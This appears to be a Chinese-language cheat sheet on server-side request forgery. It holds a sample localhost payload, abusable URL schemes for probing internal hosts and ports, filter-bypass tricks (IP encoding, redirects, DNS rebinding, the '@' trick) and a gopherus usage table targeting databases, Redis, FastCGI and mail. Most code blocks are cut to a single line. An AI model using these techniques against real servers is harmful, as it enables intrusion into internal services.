Server-Side Request Forgery (SSRF)

example
1 | # index.php |
1 | # ssrf.php |
payload
1 | ?url=http://127.0.0.1/ssrf.php?passwd=adminTrue |
利用协议
1 | file:// |
file://
1 | file:// |
dict://
1 | # 配合Capture探测存活主机和端口 |
http://
1 | # 配合Capture扫目录 |
gopher://
1 | # 默认端口 70 |
Bypass
进制转换
1 | # localhost 127.0.0.1 |
302重定向
1 | php -S 0.0.0.0:2222 |
DNS重绑定
1 | https://lock.cmpxchg8b.com/rebinder.html |
# @
1 | http://www.baidu.com@www.qq.com // 实则访问www.qq.com |
gopherus
Usage
| Command | Description |
|---|---|
| gopherus –help | Help |
| gopherus –exploit | Arguments can be : |
| –exploit mysql | |
| –exploit postgresql | |
| –exploit fastcgi | |
| –exploit redis | |
| –exploit zabbix | |
| –exploit pymemcache | |
| –exploit rbmemcache | |
| –exploit phpmemcache | |
| –exploit dmpmemcache | |
| –exploit smtp |
